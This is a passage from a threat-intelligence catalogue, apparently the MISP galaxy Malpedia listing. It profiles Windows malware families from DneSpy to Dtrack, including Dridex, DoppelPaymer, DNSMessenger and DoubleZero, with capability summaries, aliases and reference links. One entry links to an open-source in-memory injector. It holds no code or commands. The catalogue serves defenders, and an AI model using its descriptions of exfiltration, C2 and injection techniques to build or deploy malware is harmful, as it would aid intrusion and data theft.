DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.

The tag is: misp-galaxy:malpedia="DneSpy "

DneSpy is also known as:

Table 3361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

DNSChanger

The tag is: misp-galaxy:malpedia="DNSChanger"

DNSChanger is also known as:

Table 3362. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger

https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/

DNSMessenger

DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.

The tag is: misp-galaxy:malpedia="DNSMessenger"

DNSMessenger is also known as:

  • TEXTMATE

Table 3363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger

https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html

https://blog.talosintelligence.com/2017/03/dnsmessenger.html

DogHousePower

DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.

The tag is: misp-galaxy:malpedia="DogHousePower"

DogHousePower is also known as:

  • Shelma

Table 3366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower

http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf

Minodo

Since late February 2023, Minodo Backdoor campaigns have been employed to deliver either the Project Nemesis information stealer or more sophisticated backdoors like Cobalt Strike. This backdoor collects basic system information, which it then transmits to the C2 server. In return, it receives an AES-encrypted payload. Notably, the Minodo Backdoor is designed to contact a different C2 address for domain-joined systems. This suggests that more capable backdoors, such as Cobalt Strike, are downloaded on higher-value targets instead of Project Nemesis.

The tag is: misp-galaxy:malpedia="Minodo"

Minodo is also known as:

Table 3367. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.domino

https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/

https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor

DONOT

Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.

The tag is: misp-galaxy:malpedia="DONOT"

DONOT is also known as:

Table 3368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.donot

https://labs.k7computing.com/index.php/the-donot-apt/

https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed

donut_injector

Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42). Github: https://github.com/TheWover/donut

The tag is: misp-galaxy:malpedia="donut_injector"

donut_injector is also known as:

  • Donut

Table 3369. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector

https://thewover.github.io/Introducing-Donut/

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

DoppelDridex

DoppelDridex is a fork of Indrik Spider’s Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.

The tag is: misp-galaxy:malpedia="DoppelDridex"

DoppelDridex is also known as:

Table 3371. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/

https://redcanary.com/blog/grief-ransomware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true

https://cyber-anubis.github.io/malware%20analysis/dridex/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays

https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware

https://twitter.com/BrettCallow/status/1453557686830727177?s=20

DoppelPaymer

DoppelPaymer is a ransomware family that encrypts user data and then demands a ransom to restore the original files. It is recognizable by the trademark file extension it appends to encrypted files, .doppeled, and by the ransom note file it creates, named ".how2decrypt.txt".

The tag is: misp-galaxy:malpedia="DoppelPaymer"

DoppelPaymer is also known as:

  • Pay OR Grief

Table 3372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c

https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://twitter.com/AltShiftPrtScn/status/1385103712918642688

https://twitter.com/vikas891/status/1385306823662587905

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.ic3.gov/Media/News/2020/201215-1.pdf

https://techcrunch.com/2020/03/01/visser-breach/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/

https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/BrettCallow/status/1453557686830727177?s=20

https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding

http://www.secureworks.com/research/threat-profiles/gold-heron

https://www.secureworks.com/research/threat-profiles/gold-heron

https://sites.temple.edu/care/ci-rw-attacks/

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://redcanary.com/blog/grief-ransomware/

https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen

https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/

DOSTEALER

According to Mandiant, DOSTEALER is a data miner that harvests browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.

The tag is: misp-galaxy:malpedia="DOSTEALER"

DOSTEALER is also known as:

Table 3376. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dostealer

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Dot Ransomware

The tag is: misp-galaxy:malpedia="Dot Ransomware"

Dot Ransomware is also known as:

  • MZP Ransomware

Table 3377. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware

https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html

DOUBLEBACK

DOUBLEBACK is a fileless backdoor first reported by FireEye in 2021, deployed in a phishing campaign that took place in December 2020 and attributed to the threat actor tracked as UNC2529. According to FireEye, DOUBLEBACK is the final payload delivered onto compromised systems; its task is to establish and maintain backdoor access to the victim's machine.

The tag is: misp-galaxy:malpedia="DOUBLEBACK"

DOUBLEBACK is also known as:

Table 3378. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html

DoubleFinger

The tag is: misp-galaxy:malpedia="DoubleFinger"

DoubleFinger is also known as:

Table 3380. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger

https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/

DoubleZero

A .NET wiper written in C#, reported by CERT-UA on 17 March 2022.

The tag is: misp-galaxy:malpedia="DoubleZero"

DoubleZero is also known as:

  • FiberLake

Table 3382. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html

https://cert.gov.ua/article/38088

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://unit42.paloaltonetworks.com/doublezero-net-wiper/

https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

DownPaper

DownPaper, sometimes delivered as sami.exe, is a backdoor trojan whose main functionality is to download and run a second stage. It has been observed in campaigns of Charming Kitten, an Iranian cyberespionage group.

The tag is: misp-galaxy:malpedia="DownPaper"

DownPaper is also known as:

Table 3385. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper

https://www.infinitumit.com.tr/apt-35/

https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

http://www.clearskysec.com/charmingkitten/

DramNudge

The tag is: misp-galaxy:malpedia="DramNudge"

DramNudge is also known as:

Table 3386. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge

DreamBot

Lineage:

  • 2010: Gozi v2.0 (Gozi ISFB, ISFB, Pandemyia(*))

  • 2014: Dreambot (Gozi ISFB variant)

In 2014, a variant of Gozi ISFB was developed. The dropper mainly adds anti-VM checks (VMware, VirtualBox, QEMU), while the bot DLL itself remains largely unchanged. New functionality such as Tor support was added, and the Fluxxy fast-flux network is frequently used for its infrastructure.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="DreamBot"

DreamBot is also known as:

Table 3388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot

https://lokalhost.pl/gozi_tree.txt

https://www.youtube.com/watch?v=EyDiIAtdI

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122

https://community.riskiq.com/article/30f22a00

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

Dridex

OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs are effective only in the short-term."

According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method."

IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows use to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."

The tag is: misp-galaxy:malpedia="Dridex"

Dridex is also known as:

Table 3389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://viql.github.io/dridex/

https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/

https://www.secureworks.com/research/threat-profiles/gold-drake

https://malwarebookreports.com/cryptone-cobalt-strike/

https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://en.wikipedia.org/wiki/Maksim_Yakubets

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf

https://securityintelligence.com/dridexs-cold-war-enter-atombombing/

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://cyber-anubis.github.io/malware%20analysis/dridex/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/

https://twitter.com/TheDFIRReport/status/1356729371931860992

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/

https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf

https://www.atomicmatryoshka.com/post/malware-headliners-dridex

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays

https://twitter.com/Cryptolaemus1/status/1407135648528711680

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf

https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://community.riskiq.com/article/e4fb7245

https://unit42.paloaltonetworks.com/travel-themed-phishing/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/

https://intel471.com/blog/a-brief-history-of-ta505

https://home.treasury.gov/news/press-releases/sm845

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://assets.virustotal.com/reports/2021trends.pdf

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

http://www.secureworks.com/research/threat-profiles/gold-heron

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://community.riskiq.com/article/2cd1c003

https://www.secureworks.com/research/threat-profiles/gold-heron

https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes

https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/

https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/

https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office

https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/

https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/

https://twitter.com/felixw3000/status/1382614469713530883?s=20

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.youtube.com/watch?v=1VB15_HgUkg

https://blog.lexfo.fr/dridex-malware.html

https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77

https://muha2xmad.github.io/unpacking/dridex/

https://artik.blue/malware3

https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/privateloader-malware

https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction

https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state

DRIFTPIN

Driftpin is a small and simple backdoor that lets the attackers assess a victim. When executed, the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes, and report system information and the campaign ID.

The tag is: misp-galaxy:malpedia="DRIFTPIN"

DRIFTPIN is also known as:

  • Spy.Agent.ORM

  • Toshliph

Table 3390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin

https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

Dripion

The tag is: misp-galaxy:malpedia="Dripion"

Dripion is also known as:

  • Masson

Table 3391. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion

https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

DriveOcean

A remote access tool that communicates with its operators via Google Drive.

The tag is: misp-galaxy:malpedia="DriveOcean"

DriveOcean is also known as:

  • Google Drive RAT

Table 3392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean

https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

DropBook

DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.

The tag is: misp-galaxy:malpedia="DropBook"

DropBook is also known as:

Table 3394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

Dtrack

Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes uploading files to the victim's computer, downloading files from it, dumping disk volume data, establishing persistence, and more.

A Dtrack variant was found in the network of the Kudankulam Nuclear Power Plant (KNPP) in India, where it was used in a targeted attack.

The tag is: misp-galaxy:malpedia="Dtrack"

Dtrack is also known as:

  • Preft

  • TroyRAT

Table 3396. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/

https://securelist.com/dtrack-targeting-europe-latin-america/107798/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

